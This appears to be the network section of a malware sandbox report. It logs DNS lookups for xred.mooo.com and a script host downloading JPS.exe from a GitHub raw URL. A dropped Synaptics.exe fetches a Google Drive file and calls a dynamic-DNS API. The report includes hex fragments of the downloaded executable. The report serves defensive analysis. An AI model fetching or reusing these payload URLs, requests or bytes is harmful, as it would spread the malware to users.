                                                                                                                                                        Dec 30, 2024 11:49:42.751564026 CET555250242172.111.138.100192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:49:42.751692057 CET502425552192.168.2.7172.111.138.100
                                                                                                                                                        Dec 30, 2024 11:49:42.751974106 CET502425552192.168.2.7172.111.138.100
                                                                                                                                                        Dec 30, 2024 11:49:42.756740093 CET555250242172.111.138.100192.168.2.7

                                                                                                                                                        UDP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Dec 30, 2024 11:47:40.084043980 CET5427453192.168.2.71.1.1.1
                                                                                                                                                        Dec 30, 2024 11:47:40.090697050 CET53542741.1.1.1192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:04.901699066 CET5652853192.168.2.71.1.1.1
                                                                                                                                                        Dec 30, 2024 11:48:04.908507109 CET53565281.1.1.1192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:05.613075972 CET6104953192.168.2.71.1.1.1
                                                                                                                                                        Dec 30, 2024 11:48:05.620081902 CET53610491.1.1.1192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:05.646159887 CET5901553192.168.2.71.1.1.1
                                                                                                                                                        Dec 30, 2024 11:48:05.653178930 CET53590151.1.1.1192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:05.974272966 CET5153953192.168.2.71.1.1.1
                                                                                                                                                        Dec 30, 2024 11:48:05.981460094 CET53515391.1.1.1192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:09.905668020 CET5483753192.168.2.71.1.1.1
                                                                                                                                                        Dec 30, 2024 11:48:09.912245035 CET53548371.1.1.1192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:15.606206894 CET6110453192.168.2.71.1.1.1
                                                                                                                                                        Dec 30, 2024 11:48:15.613353968 CET53611041.1.1.1192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:20.136296034 CET6353853192.168.2.71.1.1.1
                                                                                                                                                        Dec 30, 2024 11:48:20.143455029 CET53635381.1.1.1192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:26.096601963 CET5803853192.168.2.71.1.1.1
                                                                                                                                                        Dec 30, 2024 11:48:26.104624987 CET53580381.1.1.1192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:32.997709990 CET5379853192.168.2.71.1.1.1
                                                                                                                                                        Dec 30, 2024 11:48:33.004710913 CET53537981.1.1.1192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:37.921677113 CET6273153192.168.2.71.1.1.1
                                                                                                                                                        Dec 30, 2024 11:48:37.928535938 CET53627311.1.1.1192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:43.575273991 CET5957253192.168.2.71.1.1.1
                                                                                                                                                        Dec 30, 2024 11:48:43.582453012 CET53595721.1.1.1192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:48.091444016 CET5708453192.168.2.71.1.1.1
                                                                                                                                                        Dec 30, 2024 11:48:48.098675966 CET53570841.1.1.1192.168.2.7
                                                                                                                                                        Dec 30, 2024 11:48:53.763044119 CET5284153192.168.2.71.1.1.1
                                                                                                                                                        Dec 30, 2024 11:48:53.770006895 CET53528411.1.1.1192.168.2.7

                                                                                                                                                        DNS Queries

                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                        Dec 30, 2024 11:47:40.084043980 CET192.168.2.71.1.1.10x4ac7Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:04.901699066 CET192.168.2.71.1.1.10xaf2dStandard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:05.613075972 CET192.168.2.71.1.1.10x6bdeStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:05.646159887 CET192.168.2.71.1.1.10x1e1Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:05.974272966 CET192.168.2.71.1.1.10xffacStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:09.905668020 CET192.168.2.71.1.1.10x9aStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:15.606206894 CET192.168.2.71.1.1.10xddb6Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:20.136296034 CET192.168.2.71.1.1.10xad35Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:26.096601963 CET192.168.2.71.1.1.10x585eStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:32.997709990 CET192.168.2.71.1.1.10xd2eeStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:37.921677113 CET192.168.2.71.1.1.10x4ad7Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:43.575273991 CET192.168.2.71.1.1.10xe42fStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:48.091444016 CET192.168.2.71.1.1.10x22b2Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:53.763044119 CET192.168.2.71.1.1.10x8fb3Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false

                                                                                                                                                        DNS Answers

                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                        Dec 30, 2024 11:47:40.090697050 CET1.1.1.1192.168.2.70x4ac7No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:47:40.090697050 CET1.1.1.1192.168.2.70x4ac7No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:47:40.090697050 CET1.1.1.1192.168.2.70x4ac7No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:47:40.090697050 CET1.1.1.1192.168.2.70x4ac7No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:04.908507109 CET1.1.1.1192.168.2.70xaf2dNo error (0)docs.google.com142.250.185.78A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:05.620081902 CET1.1.1.1192.168.2.70x6bdeName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:05.653178930 CET1.1.1.1192.168.2.70x1e1No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:05.981460094 CET1.1.1.1192.168.2.70xffacNo error (0)drive.usercontent.google.com142.250.186.161A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:09.912245035 CET1.1.1.1192.168.2.70x9aName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:15.613353968 CET1.1.1.1192.168.2.70xddb6Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:20.143455029 CET1.1.1.1192.168.2.70xad35Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:26.104624987 CET1.1.1.1192.168.2.70x585eName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:33.004710913 CET1.1.1.1192.168.2.70xd2eeName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:37.928535938 CET1.1.1.1192.168.2.70x4ad7Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:43.582453012 CET1.1.1.1192.168.2.70xe42fName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:48.098675966 CET1.1.1.1192.168.2.70x22b2Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                        Dec 30, 2024 11:48:53.770006895 CET1.1.1.1192.168.2.70x8fb3Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                        • raw.githubusercontent.com
                                                                                                                                                        • docs.google.com
                                                                                                                                                        • drive.usercontent.google.com
                                                                                                                                                        • freedns.afraid.org

                                                                                                                                                        HTTP Packets

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        0192.168.2.74982869.42.215.252807744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 30, 2024 11:48:05.662220001 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                                                        User-Agent: MyApp
                                                                                                                                                        Host: freedns.afraid.org
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Dec 30, 2024 11:48:06.244319916 CET243INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:06 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                        X-Cache: MISS
                                                                                                                                                        Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        0192.168.2.749699185.199.108.133443400C:\Windows\System32\wscript.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:47:40 UTC372OUTGET /knkbkk212/knkbkk212/refs/heads/main/JPS.exe HTTP/1.1
                                                                                                                                                        Accept: */*
                                                                                                                                                        Accept-Language: en-ch
                                                                                                                                                        UA-CPU: AMD64
                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                        Host: raw.githubusercontent.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-12-30 10:47:40 UTC904INHTTP/1.1 200 OK
                                                                                                                                                        Connection: close
                                                                                                                                                        Content-Length: 1989120
                                                                                                                                                        Cache-Control: max-age=300
                                                                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                        ETag: "bdddedd12f441fd49d4b4a9b2460315902308429e08ce76c54dcf4a1b24922a8"
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        X-Frame-Options: deny
                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                        X-GitHub-Request-Id: 2633:10771E:2D85756:33596B9:67727A4A
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:47:40 GMT
                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                        X-Served-By: cache-nyc-kteb1890089-NYC
                                                                                                                                                        X-Cache: MISS
                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                        X-Timer: S1735555661.706106,VS0,VE75
                                                                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                        X-Fastly-Request-ID: c54722dd14ebf1e7c5fd454e83a069a51b09cfa6
                                                                                                                                                        Expires: Mon, 30 Dec 2024 10:52:40 GMT
                                                                                                                                                        Source-Age: 0
                                                                                                                                                        2024-12-30 10:47:40 UTC1378INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                        2024-12-30 10:47:40 UTC1378INData Raw: ff ff cc 83 44 24 04 f8 e9 e9 54 00 00 83 44 24 04 f8 e9 07 55 00 00 83 44 24 04 f8 e9 11 55 00 00 cc cc 65 11 40 00 6f 11 40 00 79 11 40 00 01 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 85 11 40 00 08 00 00 00 00 00 00 00 8d 40 00 00 12 40 00 91 11 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 40 00 0c 00 00 00 c0 10 40 00 34 3e 40 00 2c 66 40 00 38 66 40 00 48 3e 40 00 3c 3e 40 00 48 66 40 00 a0 3b 40 00 dc 3b 40 00 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 8b c0 18 12 40 00 04 09 54 44 61 74 65 54 69 6d 65 01 ff 25 88 02 4a 00 8b c0 ff 25 84 02 4a 00 8b c0 ff 25 80 02 4a 00 8b c0 ff 25 7c 02 4a 00 8b c0 ff 25 78 02 4a 00 8b c0 ff 25 74 02 4a 00 8b c0 ff 25 70 02 4a 00 8b c0 ff 25 6c 02 4a
                                                                                                                                                        Data Ascii: D$TD$UD$Ue@o@y@F@@@@@@4>@,f@8f@H>@<>@Hf@;@;@TInterfacedObject@TDateTime%J%J%J%|J%xJ%tJ%pJ%lJ
                                                                                                                                                        2024-12-30 10:47:40 UTC1378INData Raw: 3b ee 77 46 8b c6 03 43 0c 3b 44 24 10 77 3b 3b 74 24 08 73 04 89 74 24 08 8b c6 03 43 0c 3b 44 24 0c 76 04 89 44 24 0c 68 00 80 00 00 6a 00 56 e8 ef fc ff ff 85 c0 75 0a c7 05 c8 e5 49 00 01 00 00 00 8b c3 e8 8a fd ff ff 8b df 81 fb ec e5 49 00 75 a7 8b 44 24 04 33 d2 89 10 83 7c 24 0c 00 74 19 8b 44 24 04 8b 54 24 08 89 10 8b 44 24 0c 2b 44 24 08 8b 54 24 04 89 42 04 83 c4 14 5d 5f 5e 5b c3 53 56 57 55 83 c4 f4 89 4c 24 04 89 14 24 8b d0 8b ea 81 e5 00 f0 ff ff 03 14 24 81 c2 ff 0f 00 00 81 e2 00 f0 ff ff 89 54 24 08 8b 44 24 04 89 28 8b 44 24 08 2b c5 8b 54 24 04 89 42 04 8b 35 ec e5 49 00 eb 3c 8b 5e 08 8b 7e 0c 03 fb 3b eb 76 02 8b dd 3b 7c 24 08 76 04 8b 7c 24 08 3b fb 76 1e 6a 04 68 00 10 00 00 2b fb 57 53 e8 26 fc ff ff 85 c0 75 0a 8b 44 24 04 33
                                                                                                                                                        Data Ascii: ;wFC;D$w;;t$st$C;D$vD$hjVuIIuD$3|$tD$T$D$+D$T$B]_^[SVWUL$$$T$D$(D$+T$B5I<^~;v;|$v|$;vjh+WS&uD$3
                                                                                                                                                        2024-12-30 10:47:40 UTC1378INData Raw: e8 d5 f7 ff ff 68 cc e5 49 00 e8 d3 f7 ff ff c3 e9 05 27 00 00 eb db 5b 5d c3 53 3b 05 18 e6 49 00 75 09 8b 50 04 89 15 18 e6 49 00 8b 50 04 8b 48 08 81 f9 00 10 00 00 7f 38 3b c2 75 17 85 c9 79 03 83 c1 03 c1 f9 02 a1 24 e6 49 00 33 d2 89 54 88 f4 eb 24 85 c9 79 03 83 c1 03 c1 f9 02 8b 1d 24 e6 49 00 89 54 8b f4 8b 00 89 02 89 50 04 5b c3 8b 00 89 02 89 50 04 5b c3 8d 40 00 8b 15 28 e6 49 00 eb 10 8b 4a 08 3b c1 72 07 03 4a 0c 3b c1 72 16 8b 12 81 fa 28 e6 49 00 75 e8 c7 05 c8 e5 49 00 03 00 00 00 33 d2 8b c2 c3 90 53 8b ca 83 e9 04 8d 1c 01 83 fa 10 7c 0f c7 03 07 00 00 80 8b d1 e8 b9 01 00 00 5b c3 83 fa 04 7c 0c 8b ca 81 c9 02 00 00 80 89 08 89 0b 5b c3 ff 05 b4 e5 49 00 8b d0 83 ea 04 8b 12 81 e2 fc ff ff 7f 83 ea 04 01 15 b8 e5 49 00 e8 f3 05 00 00
                                                                                                                                                        Data Ascii: hI'[]S;IuPIPH8;uy$I3T$y$ITP[P[@(IJ;rJ;r(IuI3S|[|[II
                                                                                                                                                        2024-12-30 10:47:40 UTC1378INData Raw: 55 8b ec 83 c4 f8 53 56 57 8b d8 80 3d c4 e5 49 00 00 75 09 e8 fb f8 ff ff 84 c0 74 08 81 fb f8 ff ff 7f 7e 0a 33 c0 89 45 fc e9 54 01 00 00 33 c9 55 68 04 23 40 00 64 ff 31 64 89 21 80 3d 4d e0 49 00 00 74 0a 68 cc e5 49 00 e8 20 f2 ff ff 83 c3 07 83 e3 fc 83 fb 0c 7d 05 bb 0c 00 00 00 81 fb 00 10 00 00 0f 8f 93 00 00 00 8b c3 85 c0 79 03 83 c0 03 c1 f8 02 8b 15 24 e6 49 00 8b 54 82 f4 85 d2 74 79 8b f2 8b c6 03 c3 83 20 fe 8b 42 04 3b d0 75 1a 8b c3 85 c0 79 03 83 c0 03 c1 f8 02 8b 0d 24 e6 49 00 33 ff 89 7c 81 f4 eb 26 8b cb 85 c9 79 03 83 c1 03 c1 f9 02 8b 3d 24 e6 49 00 89 44 8f f4 8b 0a 89 4d f8 8b 4d f8 89 41 04 8b 4d f8 89 08 8b c6 8b 52 08 83 ca 02 89 10 83 c0 04 89 45 fc ff 05 b4 e5 49 00 83 eb 04 01 1d b8 e5 49 00 e8 a2 21 00 00 e9 84 00 00 00
                                                                                                                                                        Data Ascii: USVW=Iut~3ET3Uh#@d1d!=MIthI }y$ITty B;uy$I3|&y=$IDMMAMREII!
                                                                                                                                                        2024-12-30 10:47:40 UTC1378INData Raw: c0 74 05 89 5d fc eb 36 8b c6 e8 8f fa ff ff 8b f8 8b c3 83 e8 04 8b 00 25 fc ff ff 7f 83 e8 04 3b f0 7d 02 8b c6 85 ff 74 11 8b d7 8b cb 91 e8 be 02 00 00 8b c3 e8 f3 fb ff ff 89 7d fc 33 c0 5a 59 59 64 89 10 68 50 27 40 00 80 3d 4d e0 49 00 00 74 0a 68 cc e5 49 00 e8 b8 ec ff ff c3 e9 f2 1b 00 00 eb e5 8b 45 fc 5f 5e 5b 59 5d c3 8d 40 00 53 85 c0 7e 15 ff 15 44 b0 49 00 8b d8 85 db 75 0b b0 01 e8 44 01 00 00 eb 02 33 db 8b c3 5b c3 53 85 c0 74 15 ff 15 48 b0 49 00 8b d8 85 db 74 0b b0 02 e8 24 01 00 00 eb 02 33 db 8b c3 5b c3 8b 08 85 c9 74 32 85 d2 74 18 50 89 c8 ff 15 4c b0 49 00 59 09 c0 74 19 89 01 c3 b0 02 e9 fa 00 00 00 89 10 89 c8 ff 15 48 b0 49 00 09 c0 75 eb c3 b0 01 e9 e4 00 00 00 85 d2 74 10 50 89 d0 ff 15 44 b0 49 00 59 09 c0 74 e7 89 01 c3
                                                                                                                                                        Data Ascii: t]6%;}t}3ZYYdhP'@=MIthIE_^[Y]@S~DIuD3[StHIt$3[t2tPLIYtHIutPDIYt
                                                                                                                                                        2024-12-30 10:47:40 UTC1378INData Raw: 06 ff 15 2c e0 49 00 b8 d2 00 00 00 e9 d3 1c 00 00 c3 8b c0 53 56 8b f2 8b d8 66 8b 43 04 66 3d b0 d7 72 06 66 3d b3 d7 76 07 bb 66 00 00 00 eb 2b 66 3d b0 d7 74 07 8b c3 e8 02 04 00 00 66 89 73 04 80 7b 48 00 75 0d 83 7b 18 00 75 07 c7 43 18 70 2d 40 00 8b c3 ff 53 18 8b d8 85 db 74 07 8b c3 e8 31 fc ff ff 8b c3 5e 5b c3 66 ba b1 d7 e8 9f ff ff ff c3 8b c0 53 8b d8 33 c0 89 43 10 33 c0 89 43 0c 6a 00 8d 43 10 50 8b 43 08 50 8b 43 14 50 8b 03 50 e8 6d e5 ff ff 85 c0 75 0e e8 e4 e5 ff ff 83 f8 6d 75 06 33 c0 5b c3 33 c0 5b c3 8d 40 00 33 c0 c3 90 53 56 51 8b d8 8b 73 0c 85 f6 75 04 33 c0 eb 26 6a 00 8d 44 24 04 50 56 8b 43 14 50 8b 03 50 e8 54 e5 ff ff 85 c0 75 07 e8 a3 e5 ff ff eb 02 33 c0 33 d2 89 53 0c 5a 5e 5b c3 8b c0 53 8b d8 53 e8 db e4 ff ff 48 0f
                                                                                                                                                        Data Ascii: ,ISVfCf=rf=vf+f=tfs{Hu{uCp-@St1^[fS3C3CjCPCPCPPmumu3[3[@3SVQsu3&jD$PVCPPTu33SZ^[SSH
                                                                                                                                                        2024-12-30 10:47:40 UTC1378INData Raw: c1 e9 10 c1 eb 10 38 d9 75 02 38 fd 5f 5e 5b c3 8b c0 53 56 51 89 ce c1 ee 02 74 26 8b 08 8b 1a 39 d9 75 45 4e 74 15 8b 48 04 8b 5a 04 39 d9 75 38 83 c0 08 83 c2 08 4e 75 e2 eb 06 83 c0 04 83 c2 04 5e 83 e6 03 74 36 8a 08 3a 0a 75 30 4e 74 13 8a 48 01 3a 4a 01 75 25 4e 74 08 8a 48 02 3a 4a 02 75 1a 31 c0 5e 5b c3 5e 38 d9 75 10 38 fd 75 0c c1 e9 10 c1 eb 10 38 d9 75 02 38 fd 5e 5b c3 90 66 81 78 04 b1 d7 75 1d 8b 50 0c 3b 50 10 73 15 03 50 14 66 f7 40 06 01 00 74 19 8a 0a 80 f9 1a 75 12 b0 01 c3 50 e8 d1 00 00 00 5a 80 fc 1a 74 f1 ff 4a 0c 31 c0 c3 90 53 56 8b d8 83 ce ff 66 8b 43 04 66 3d b0 d7 76 29 66 3d b3 d7 77 23 6a 00 8b 03 50 e8 b3 df ff ff 8b f0 83 fe ff 75 07 e8 5f f6 ff ff eb 15 8b c6 33 d2 f7 73 08 8b f0 eb 0a b8 67 00 00 00 e8 38 f6 ff ff 8b
                                                                                                                                                        Data Ascii: 8u8_^[SVQt&9uENtHZ9u8Nu^t6:u0NtH:Ju%NtH:Ju1^[^8u8u8u8^[fxuP;PsPf@tuPZtJ1SVfCf=v)f=w#jPu_3sg8
                                                                                                                                                        2024-12-30 10:47:40 UTC1378INData Raw: 08 04 39 5f 5b c3 8b c0 56 57 89 c6 89 d7 81 e1 ff 00 00 00 f3 a6 5f 5e c3 8d 40 00 8a 2a 42 08 28 40 fe c9 75 f6 c3 90 e9 03 00 00 00 c3 8b c0 53 31 db 85 c0 7c 4d 0f 84 9a 00 00 00 3d 00 14 00 00 0f 8d 81 00 00 00 89 c2 83 e2 1f 8d 14 92 db ac 53 f3 37 40 00 de c9 c1 e8 05 74 79 89 c2 83 e2 0f 74 0c 8d 14 92 db ac 53 29 39 40 00 de c9 c1 e8 04 74 61 8d 04 80 db ac 43 bf 39 40 00 de c9 eb 53 f7 d8 3d 00 14 00 00 7d 46 89 c2 83 e2 1f 8d 14 92 db ac 53 f3 37 40 00 de f9 c1 e8 05 74 34 89 c2 83 e2 0f 74 0c 8d 14 92 db ac 53 29 39 40 00 de f9 c1 e8 04 74 1c 8d 04 80 db ac 43 bf 39 40 00 de f9 eb 0e dd d8 db ab e9 37 40 00 eb 04 dd d8 d9 ee 5b c3 00 00 00 00 00 00 00 80 ff 7f 00 00 00 00 00 00 00 80 ff 3f 00 00 00 00 00 00 00 a0 02 40 00 00 00 00 00 00 00 c8
                                                                                                                                                        Data Ascii: 9_[VW_^@*B(@uS1|M=S7@tytS)9@taC9@S=}FS7@t4tS)9@tC9@7@[?@
                                                                                                                                                        2024-12-30 10:47:40 UTC1378INData Raw: 81 f9 00 00 00 ff 73 11 81 f9 00 00 00 fe 72 07 0f bf c9 03 08 ff 21 ff e1 81 e1 ff ff ff 00 01 c1 89 d0 8b 11 e9 28 29 00 00 c3 8d 40 00 55 8b ec 83 c4 f8 53 56 57 33 db 89 5d f8 8b f1 89 55 fc 8b f8 33 c0 55 68 24 3d 40 00 64 ff 30 64 89 20 33 c0 89 06 8b 55 fc 8b 07 e8 63 00 00 00 8b d8 85 db 74 31 8b 43 14 85 c0 74 13 03 f8 89 3e 83 3e 00 74 21 8b 06 50 8b 00 ff 50 04 eb 17 8d 4d f8 8b 53 18 8b c7 e8 72 ff ff ff 8b 55 f8 8b c6 e8 bc 28 00 00 83 3e 00 0f 95 c3 33 c0 5a 59 59 64 89 10 68 2b 3d 40 00 8d 45 f8 e8 89 28 00 00 c3 e9 17 06 00 00 eb f0 8b c3 5f 5e 5b 59 59 5d c3 53 56 89 c3 8b 43 b8 85 c0 74 29 8b 08 83 c0 04 8b 32 3b 30 75 18 8b 72 04 3b 70 04 75 10 8b 72 08 3b 70 08 75 08 8b 72 0c 3b 70 0c 74 13 83 c0 1c 49 75 dc 8b 5b dc 85 db 74 04 8b 1b
                                                                                                                                                        Data Ascii: sr!()@USVW3]U3Uh$=@d0d 3Uct1Ct>>t!PPMSrU(>3ZYYdh+=@E(_^[YY]SVCt)2;0ur;pur;pur;ptIu[t


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        1192.168.2.749820142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:05 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        2024-12-30 10:48:05 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:05 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-cO6vwGoc7zM-WGvcTf_NEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        2192.168.2.749821142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:05 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
